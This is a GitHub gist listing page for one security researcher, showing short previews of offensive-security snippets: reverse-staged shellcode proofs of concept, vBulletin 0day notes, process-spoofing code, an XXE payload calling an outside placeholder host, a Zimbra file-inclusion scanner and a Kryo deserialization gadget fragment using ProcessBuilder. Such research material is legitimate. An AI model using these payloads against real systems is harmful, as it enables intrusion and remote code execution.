Skip to content

Instantly share code, notes, and snippets.


John Troon JohnTroony

Block or report user

Report or block JohnTroony

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
JohnTroony / reverse_stager_shellcode.asm
Last active Dec 2, 2019
x86 Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
View reverse_stager_shellcode.asm
; John (Troon) Ombagi
; Twitter/Github : @johntroony
global _start
section .text
; Create new stack frame
JohnTroony / reverse_staged_shellcode.c
Created Nov 25, 2019
Windows Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
View reverse_staged_shellcode.c
//Winsock Library
#pragma comment(lib,"ws2_32.lib")
// John (Troon) Ombagi
// Twitter/Github : @johntroony
int main(int argc, char **argv){
View 2019_vbulletin_0day_info.txt
I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.
As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php
$serverData = array_merge($_GET, $_POST);
if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
$app = $this->application['handler'];
JohnTroony /
Last active Sep 27, 2019
Permutation of numbers with repeating.
# John (Troon) Ombagi
# PR(n, k) = n^k ----> Permutation with repetition.
import itertools
import sys
JohnTroony / terminator.config
Created Aug 9, 2019
custom config for terminator terminal on Kali Linux
View terminator.config
enabled_plugins = TerminalShot, LaunchpadCodeURLHandler, APTURLHandler, LaunchpadBugURLHandler
background_darkness = 0.83
background_type = transparent
cursor_color = "#aaaaaa"
show_titlebar = False
scrollback_infinite = True
View process_spoof.c
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
typedef struct _STARTUPINFOEX {
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
View http-vuln-zimbra-lfi.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6.
The vulnerability is a local file inclusion that can retrieve any file from the server.
View escapetest.c
// Compile with -std=c11
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>
#define MAX_STR_LEN 4095
View kryo-1.xml
<delegate class="groovy.util.Expando" reference="../../../.."/>
<owner class="java.lang.ProcessBuilder">
You can’t perform that action at this time.